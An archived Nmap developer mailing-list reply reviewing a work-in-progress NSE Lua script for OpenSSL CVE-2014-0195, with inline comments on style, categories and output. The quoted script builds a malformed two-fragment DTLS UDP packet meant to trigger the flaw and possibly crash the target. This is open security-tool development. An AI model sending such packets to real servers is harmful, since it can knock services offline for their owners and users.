Nmap Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: NSE: OpenSSL CVE-2014-0195

From: Patrick Donnelly <batrick () batbytes com>
Date: Sun, 15 Jun 2014 15:25:43 -0400
Hi Loganaden,

On Fri, Jun 13, 2014 at 5:47 PM, Loganaden Velvindron
<logan () elandsys com> wrote:

Hi All,

It's still a work in progress for OpenSSL CVE-2014-0195.

I'll update it soon, as i'm done tweaking it. Meanwhile, feedback welcomed.


Thanks for submitting this script. Feedback inline:


description=[[
Sends a UDP packet containing 2 fragments. CVE-2014-0195 shows that OpenSSL
does not validate the size of subsequent DTLS fragments after the first
one has been sent. This may cause DoS.
]]

---
--@usage nmap -sU -p <portnum> --script cve_2014_0195 --script-args cve_2014_0195.ports=<ports> <target>


Please add example output (@output).


author = "Loganaden Velvindron (logan () elandsys com)"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html";
categories = {"dos", "vuln"}


Please add the script to "intrusive". All scripts must either be
"safe" or "intrusive".


local string = require "string"
local shortport = require "shortport"
local bin = require "bin"
local comm = require "comm"
local stdnse = require "stdnse"

portrule = function(host, port)
  if not stdnse.get_script_args(SCRIPT_NAME .. ".ports") then
    stdnse.print_debug(3,"Skipping '%s' %s, 'ports' argument is missing.",SCRIPT_NAME, SCRIPT_TYPE)
    return false
  end

local ports = stdnse.get_script_args(SCRIPT_NAME .. ".ports")

--print out a debug message if port 443/udp is open
  if port.number==443 and port.protocol == "udp" and not(ports) then
    stdnse.print_debug("Port 443/udp is open. TLS over UDP")
    return false
  end

  return port.protocol == "udp" and stdnse.in_port_range(port, ports:gsub(",",",") ) and
    not(shortport.port_is_excluded(port.number,port.protocol))
end

-- first fragment
local frag1 =
string.char(0x01)
..string.char(0x00) ..bin.pack(">H", 16)
..string.char(0x00, 0x00)
..string.char(0x00, 0x00, 0x00)
..string.char(0x00) ..bin.pack(">H",15)
..string.rep("A",15)


You might find a construction like this easier:

local frag1 = "\x01\x00" .. bin.pack(">H", 16) .. ("\x00"):rep(6) ..
bin.pack(">H",15) .. ("A"):rep(15)

This is using Lua 5.2's hex string support.


-- second fragment
local frag2 =
string.char(0x01)
..string.char(0x00) ..bin.pack(">H", 4098)
..string.char(0x00, 0x00)
..string.char(0x00, 0x00, 0x00)
..string.char(0x00) ..bin.pack(">H",4097)
..string.rep("B",4097)

local msg =
string.char(0x01)
..bin.pack(">H", 0xfeff)
..bin.pack(">H", 0x00)
..string.char(0x00,0x00,0x00,0x00,0x00,0x00)
..bin.pack(">H",string.len(frag1..frag2))

local payload = msg .. frag1 .. frag2


Could you add some comments about how this binary data is derived?


action = function(host, port)
local status, result = comm.exchange(host, port, payload, {proto="udp"})

if not status then
        return false
else
        return true
end

end


Here a detection of the possible DoS would be appropriate I think? In
any case, please provide output to the user saying at least that the
script sent a probe.

Thanks again! I look forward to seeing the finished script.

-- 
Patrick Donnelly
_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
Previous By Date Next
Previous By Thread Next

Current thread: